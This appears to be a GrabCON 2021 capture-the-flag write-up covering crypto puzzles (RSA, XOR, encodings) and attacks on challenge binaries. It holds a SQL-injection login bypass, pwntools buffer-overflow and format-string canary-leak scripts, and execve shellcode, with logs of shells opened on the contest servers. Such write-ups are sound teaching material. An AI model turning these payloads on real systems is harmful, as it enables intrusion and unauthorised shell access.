Welcome
50
GrabCON{welcome_to_grabcon_2021}
E4sy Pe4sy
100
Hack admin user!
Link
Author: r3curs1v3_pr0xy
' or 1=1;# '
GrabCON{E4sy_pe4sy_SQL_1nj3ct10n}
Warm-up
50
Mukesh used to drink and then smoke 5 times a day. He is now suffering form cancer his drink was 64 rupees and 32 rupees cigarette that costs to cheap for him. And he has this much of cancer now.
Author: Offen5ive
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)&input=UzAxWlJFTlhVMU5KVmtoR1VWWktVa3BhUmtaTk1sTkxTVFZLVkVOV1UweExWbFpZUVZsTFZFbGFUa1ZWVmxSTlMwcElSa2MyVTFkS1ZrcEhWMDFMV0V0YVExVlZWRU5YVGxKT1JsTlZTMWRPVWtkR1MwMUVWVXMxUzBkWFZsTkxTMXBEV0ZGVVExUk9VbGxGVDFWVVRFMVNURlpEVFV4RlNrNU1SMWMwUTBsTFdWbEVRMVJEV0V0V01rWk5WakpXVGtKS1JrMVNTMDlNUWt0SFYwNUVXa3RLVjBVMFZsTk9UbEpUUlZkV1ZFdExTa3hXUjAxQ1VrbE9URWRYTlVOUVMwNVhSa1ZTUTFkTFdraEZTVlZhVWs5Q1RVWkZNakpYUzFaS1ZFTlhVMHRMV2xaV1ZWSlRWVWRHVEVaTFZrTkdSMFpJVlRSU1UxWlFSa2RYV1ZSVFRVdE9WbFJMVkV0VFIwWlNWRUZWU2xGTlVrZEdTVlpVVFVzMVNrWk5WRXhhUzFwV1dFbFdNazVPVGt4Rk5GWlVTMHBLVEZaSlVreFJTbFpLUjFkTlMxUkxUVmxFVTFSRFZrNU9Na1ZSVmpKWFNscExSazFXVEZWS1RrcFVRMVZUUlV0YVYwVTBWakpUUjBKT1JrbFZVMWROVWt4R1RWSk1WVXBTU2xkWE5rTllTMGxaVmxWU1ExUkhRVmxWVDFaRFJrMVNUVVUwVmt0UFMwWktWRU5UVTBWTFdsZEdUVlpMVWtkR1UwVTJWa3hNVFZKTlZrdE5TMWROUmt0WFYwOUxSRXRGV1VaVlZVTldUazR5UlZGVldsSlBRa2RHVFZKTFQwczFTMVJCTTBOTlMwcFdXRkZUUTFoTFdsTkZTVlpNVEUxU1JGWkpNakl5U2xKTVIxZFVVMGhMU1ZsV1ZWTXlWMDVPVTBaSFZUTXlTa3BHUmtzeU0wVkxWa2xXVFZWVFZVdFNTMWhKVkRKWFIwSk9SazFXVERKS1NrMUdSVTFETWt0T1RFVkxVbE5YUzA1WFJVMVZRMUpPVGxORlQxWkVNa3BHTlVaUFZreE1SMFpLVkVGWFUwOUxXVmxWTkZKVFZFZEdXVVZKVmxKUlRsSktSVEl5V2xaS05VdEhWMDVMUjB0V1RFWlZWa05YVGswMFZVZFZNMHhNU2taR1N6SXpXVXRLU2xkWFUxTk1TMGxaVjBkTlMxSkhSa3BGV1ZaTVRFcGFUVlpMVmxOUFNsSkxWRUUxUTFOTE5VdFdSVlpEVjB0V1NFWk5WVkpSU1ZWWlJrMHlNa2RMV2twWFZWWlRTa3RhUzBSQlQwdFJTMUZaUkZOVlExSklWVFpSUFQwOVBRPT0K
GrabCON{dayuum_s0n!}
Poke Ball RSA
100
Eevee is in trouble. Help him as he tries to evolve into Sylveon in the Real Stormy Arena.
Author: RDxR10
n = 498934084350094415783044823223130007435556803301613073259727203199325937230080661117917023582579699673759861892703348357714077684549303787581429366922208568924252052118455313229534699860304480039147103608782140303489222166267907007839021544433148286217133494762766492655602977085105487216032806292874190551319
e = 134901827939710543990222584187396847806193644190423846456160711527109836908087675183249532946675670587286594441908191054495871501233678465783530503352727362726294270065122447852357566161748618195216611965946646411519602447104878893524856862722902833460104389620397589021732407447981724307130484482495521398799
c = 100132888193232309251839777842498074992587507373917163874335385921940537055226546911990198769720313749286675018486390873216490470403470144298153410686092752282228631590006943913867497072931343354481759219425807850047083814816718302223434388744485547550941814186146959750515114700335721173624212499886218608818
#https://pycryptodome.readthedocs.io/en/latest/src/public_key/rsa.html
N = 498934084350094415783044823223130007435556803301613073259727203199325937230080661117917023582579699673759861892703348357714077684549303787581429366922208568924252052118455313229534699860304480039147103608782140303489222166267907007839021544433148286217133494762766492655602977085105487216032806292874190551319
E = 134901827939710543990222584187396847806193644190423846456160711527109836908087675183249532946675670587286594441908191054495871501233678465783530503352727362726294270065122447852357566161748618195216611965946646411519602447104878893524856862722902833460104389620397589021732407447981724307130484482495521398799
c = 100132888193232309251839777842498074992587507373917163874335385921940537055226546911990198769720313749286675018486390873216490470403470144298153410686092752282228631590006943913867497072931343354481759219425807850047083814816718302223434388744485547550941814186146959750515114700335721173624212499886218608818
print((E,N))
from sympy.core import Rational
from sympy.ntheory.continued_fraction import continued_fraction_convergents
from sympy.ntheory.continued_fraction import continued_fraction_iterator
from Crypto.PublicKey import RSA
import binascii
it = continued_fraction_convergents(continued_fraction_iterator(Rational(E,N)))
res=[]
for i in range(1000):
elt = next(it)
if str(elt).find("/")>-1:
d=int(str(elt).split("/")[1])
print(".",sep="",end="",flush=True)
try:
key = RSA.construct((N,E,d))
print("================")
print(d)
break
except:
pass
pt=hex(pow(c,d,N))
print(pt)
print(binascii.unhexlify(pt[2:]))
b'e=2,c=9019127052844164572606928250741960583163943438936945828390420331200602392329'
import gmpy
from Crypto.Util.number import *
e=2
ct=9019127052844164572606928250741960583163943438936945828390420331200602392329
ct= gmpy.root(ct,e)[0]
import binascii
print(binascii.unhexlify(hex(ct)[2:]))
Not RSA
440
Whatever it is, it's not RSA.
Author: RDxR10
Learn More →
from math import sqrt
import random
from Crypto.Util.number import bytes_to_long,long_to_bytes
N = 2433984714450860961589027518159810370561856716063956157321856705975948489337570445957833120668443867975490363019335530343179129689501017626817947777263721
c = 1378297008929492435762470180953416238081302819750327089183697281160938504327642742017058360280755400054663296904328307673692314945545918393502459480987913
a = int(sqrt(N) + 1)
b = random.randint(0,9999999999)
#flag = b"REDACTED"
#m = bytes_to_long(flag)
#c = ((a**m)*(b**(a-1)))%((a-1)*(a-1))
p=194545307101606186694882845905355574989
q=253593527157826835431576067999755840801
r=pow(c,pow(p*q,-1,(p-1)*(q-1)),p*q)
m=((((c*pow(r,-p*q,N))-1)%N)//(p*q))%N
print(hex(m))
print(long_to_bytes(m))
#GrabCON{i75_p4ill13r_f0lks}
GrabCON{i75_p4ill13r_f0lks}
Old Monk's Password
150
Monk: What's this man? One password, different encoded forms?
Author: RDxR10
enc = b'\x0cYUV\x02\x13\x16\x1a\x01\x04\x05C\x00\twcx|z(((%.)=K%(>'
enc1 = b'\x0bPPS\r\x0b\x02\x0f\x12\r\x03_G\t\x08yb}v+--*+*8=W,>'
enc2 = b'\x07A[\x06\\\r\x15\t\x04\x07\x18VG]U]@\x02\x08&9&%\' 41".;'
import codecs
import random
class pass_w:
x = "hjlgyjgyj10hadanvbwdmkw00OUONBADANKHM;IMMBMZCNihaillm"
def encode(self, text, i = -1):
if i < 0 or i > len(self.x) + 1:
i = random.randint(0, len(self.x) + 1)
out = chr(i)
for c in text:
out += chr(ord(c) ^ ord(self.x[i]))
i = (i + 1)%79
return codecs.encode(out)
#y = pass_w()
#print(y.encode("REDACTED"))
#Enclose password within GrabCON{}
def decode(enc):
x = "hjlgyjgyj10hadanvbwdmkw00OUONBADANKHM;IMMBMZCNihaillm"
i = enc[0]
print(i)
out=""
for c in enc[1:]:
out += chr(c ^ ord(x[i]))
i = (i + 1)%79
print(out)
print(decode(enc))
GrabCON{817letmein40986728ilikeapples}
from pwn import *
# Read Service
proc = ELF("./easybin")
print(proc.symbols)
# magie
magie = p64(proc.symbols["vuln"])
for i in range(56,57):
# lockpick
print(i)
pl=b"a"*i+magie
print(pl)
# Execute
try:
exec=process("./easybin")
exec.sendline(pl)
#print(exec.read(1024))
exec.interactive()
#print(exec.poll())
exec.close()
except:
pass
exploit=True
if exploit:
conn = remote('35.205.161.145','49153')
#pl=b"a"*i+magie
#print(conn.recv())
conn.sendline(pl)
conn.interactive()
conn.close()
[*] '/home/kali/Desktop/grabcon/pwn/easybin'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
{'__abi_tag': 4195228, 'deregister_tm_clones': 4198560, 'register_tm_clones': 4198608, '__do_global_dtors_aux': 4198672, 'completed.0': 4210752, '__do_global_dtors_aux_fini_array_entry': 4210184, 'frame_dummy': 4198720, '__frame_dummy_init_array_entry': 4210176, '__FRAME_END__': 4202884, '__init_array_end': 4210184, '_DYNAMIC': 4210192, '__init_array_start': 4210176, '__GNU_EH_FRAME_HDR': 4202552, '_GLOBAL_OFFSET_TABLE_': 4210688, '__libc_csu_fini': 4198928, 'data_start': 4210736, 'vuln': 4198726, '_edata': 4210752, '_fini': 4198936, '__data_start': 4210736, '__dso_handle': 4210744, '_IO_stdin_used': 4202496, '__libc_csu_init': 4198816, '_end': 4210760, '_dl_relocate_static_pie': 4198544, '_start': 4198496, '__bss_start': 4210752, 'main': 4198762, '__TMC_END__': 4210752, '_init': 4198400, 'printf': 4198448, 'plt.printf': 4198448, 'execve': 4198464, 'plt.execve': 4198464, 'gets': 4198480, 'plt.gets': 4198480, '_ITM_deregisterTMCloneTable': 4210656, 'got._ITM_deregisterTMCloneTable': 4210656, '__libc_start_main': 4210664, 'got.__libc_start_main': 4210664, '__gmon_start__': 4210672, 'got.__gmon_start__': 4210672, '_ITM_registerTMCloneTable': 4210680, 'got._ITM_registerTMCloneTable': 4210680, 'got.printf': 4210712, 'got.execve': 4210720, 'got.gets': 4210728}
56
b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaF\x11@\x00\x00\x00\x00\x00'
[+] Starting local process './easybin': pid 37201
[*] Switching to interactive mode
$ exit
[*] Got EOF while reading in interactive
$ quit
[*] Process './easybin' stopped with exit code 0 (pid 37201)
[*] Got EOF while sending in interactive
[+] Opening connection to 35.205.161.145 on port 49153: Done
[*] Switching to interactive mode
$ ls
easybin
flag.txt
run.sh
ynetd
$ cat flag.txt
GrabCON{w3ll_Y0u_Kn0w_Basics!!!}
leak the canary ?
from pwn import *
import time
# Read Service
proc = ELF("./cancancan")
print(proc.symbols)
# magie
magie = p32(proc.symbols["win"])
for i in range(25,26):
# Iteration
print(i)
# Execute
try:
exec=process("./cancancan")
exec.sendline(b"%31$x")
canary = int(b"0x"+exec.recv(1024).split(b"\n")[1],16)
pl = b"aaaa"*i+p32(canary)+magie*4
exec.sendline(pl)
exec.interactive()
#print(exec.poll())
exec.close()
except:
pass
exploit=True
if exploit:
conn = remote('35.246.42.94','31337')
conn.sendline(b"%31$x")
time.sleep(1)
canary = int(b"0x"+conn.recv(1024).split(b"\n")[1],16)
print(canary)
pl = b"aaaa"*i+p32(canary)+magie*4
conn.sendline(pl)
conn.interactive()
conn.close()
pass
# GrabCON{Byp4ss_can4ry_1s_fun!}
GrabCON{Byp4ss_can4ry_1s_fun!}
Shellcode on the stack,
from pwn import *
import time
for i in range(302,303):
print(i)
conn = remote("35.246.42.94","1337")#process("./pwn2")
time.sleep(2)
stack = int(conn.recv().split(b"\n")[1].split(b" ")[2][:-1],16)
print(hex(stack))
#pl =b"\x90"*i+p32(stack)+b"\x90"*100+b"\x31\xc0\x40\x89\xc3\xcd\x80"#b"\x90"*100+b"\x50\x48\x31\xD2\x48\x31\xF6\x48\xBB\x6D\x20\x2B\x2C\x6D\x6D\x31\x2A\x48\xB8\x42\x42\x42\x42\x42\x42\x42\x42\x48\x31\xC3\x53\x54\x5F\x48\x31\xC0\xB0\x3B\x0F\x05"
pl =b"\x90"*i+p32(stack)+b"\x90"*100+b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
conn.sendline(pl)
time.sleep(1)
try:
#print(conn.recv())
conn.interactive()
except:
conn.close()
conn.close()
input()
#conn.interactive()
kali@kali:~/Desktop/grabcon/pwn$ python3 blacklisted.py
302
[+] Opening connection to 35.246.42.94 on port 1337: Done
0xffe7d4be
[*] Switching to interactive mode
$
$ ls
bin
dev
flag.txt
lib
lib32
lib64
pwn2
$ cat flag.txt
GrabCON{Y0U_g0t_Sh3ll_B4asics}
$
GrabCON{Y0U_g0t_Sh3ll_B4asics}
That's all folks - Electro
https://flag-poisoning.fr/ Challenge - Unbr34k4bl3 - 942 points - 7 solves No one can break my rsa encryption, prove me wrong !! Flag Format: cybergrabs{} Author: Mritunjya
Feb 8, 2022Ranking 22nd on the general with 1400 pts, 13th on the professional category. Achievement First Blood on "Crypto Be Crushed" Cryptography
Nov 25, 2021Shadows The challenge is composed of two files: import json from Crypto.Util.number import bytes_to_long, getPrime from storage import flag def mul(x): m = 1
Sep 3, 2021misc/sanity-check 240 solves / 1 point I get to write the sanity check challenge! Alright! flag{1_l0v3_54n17y_ch3ck_ch4ll5} misc/discord
Jul 12, 2021or
By clicking below, you agree to our terms of service.
New to HackMD? Sign up